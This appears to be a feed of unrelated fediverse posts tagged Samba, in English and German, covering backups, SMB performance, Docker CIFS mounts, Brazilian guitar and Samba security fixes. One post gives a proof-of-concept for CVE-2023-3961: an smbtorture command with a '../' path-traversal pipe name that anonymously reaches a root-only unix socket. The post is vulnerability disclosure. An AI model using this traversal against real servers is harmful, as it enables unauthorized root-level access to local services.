#TimeMachine/ capsule backup to a #Samba server on #Debian or any other #Linux ? Is that ever reliable (I have the feeling I always have to fix it and restart from scratch)
Is there any other cheap open source backup option for Mac? Duplicati is utterly broken with that silly permission system
If you are running TrueNAS SCALE and are experiencing painfully slow SMB uploads and writes, you'll want to add the following settings to the SMB service:
CVE-2023-3961: #smbd allows client access to unix domain sockets on the file system
A client sending a pipe name containing unix directory traversal characters (../) could cause #Samba to connect to arbitrary unix domain sockets as root.
Samba: Neue Versionen beheben mehrere Sicherheitslücken
Durch verschiedene Programmierfehler konnten Angreifer auf geheime Informationen bis hin zum Kerberos-TGT-Passwort zugreifen. Aktualisierungen stehen bereit.
Here is a Proof of Concept demonstrating the #samba smbd CVE-2023-3961 #vulnerability
On victim host running vulnerable Samba set up a unix domain socket only accessible as root user:
$ sudo socat UNIX-LISTEN:/pwned,mode=700,fork stdout
On attacking host:
$ smbtorture -U "" -N ncacn_np:victimhost[/pipe/../../../../../pwned] rpc.echo
At least stock Debian install samba allows anonymous exploitation in this manner. This is quite alarming, to say the least.
Note: smbtorture is built as part of samba build procedure – On Debian based systems you can use sudo apt build-dep samba && apt source samba && cd samba-* && dpkg-buildpackage to get it. Specify LD_LIBRARY_PATH as needed to make it find the necessary shared objects.
smbtorture will talk MS-RPC protocol to the unix domain socket, and as such is not directly useful as generic #exploitation tool. #Weaponizing the vulnerability is left as exercise for the reader.
Addendum: You can't fully control the data being sent to the socket. This will like neuter most attack scenarios.
Interesting #samba smbd #vulnerability CVE-2023-3961 allows samba client to connect to any server side unix domain socket. The access occurs as root user and thus any named unix domain socket is fully accessible. If suitable service exist on the server this will lead to unauthorized access to the service, assuming the socket file access rights are the only means of authorization. The impact depends entirely on the available services on the server, but may lead to #privilegeescalation or similar high severity impacts.
Updated to add: This vulnerability is made more difficult to exploit since the attacker has somewhat limited control on the data being sent to the socket.
@Virginicus In traditional Brazilian music (samba, bossa nova, choro), there usually is no bass instrument. Instead, the acoustic guitar has an extra string tuned to a low C.
It is called "sete cordas" in Portuguese. In my experience, the player sometimes has a metal pick attached to his thumb to play these low notes.
You can see it well in the video I posted of Yamandu Costa. These low notes have such a rich, full sound!
Hm unter Debian11 (smbclient aus samba 4.13.13) tut das hier
(mit KRB5CCNAME=FILE:/tmp/krb5cc_nslcd):
smbclient -N --use-kerberos=required -gL <server>
Unter Debian 12 (smbclient aus samba 4.17.9) nicht mehr.
Mach ich was falsch oder wurde in #Samba bzw. das entsprechende Debianpaket ein Bug eingebaut?
Weiter geht es mit #Docker for Tuxi. Ich habe in #Portainer eine Volume erstellt, das per #CIFS eine Freigabe meines NAS einbindet.
Diese Freigabe wird im Container auch eingebunden. Das Problem ist, dass ich absolut nichts in diese Freigabe schreiben kann. Selbst ein chmod 777 im Container bringt nichts.
Ich suche mir echt den Wolf, finde aber absolut nichts, was zu einer Lösung führen könnte.
Was muss ich machen, dass ich im Container in das CIFS-Volume schreiben kann? #Frage#FragDieFediverse#FragDasFediverse#Followerpower@askfedi_de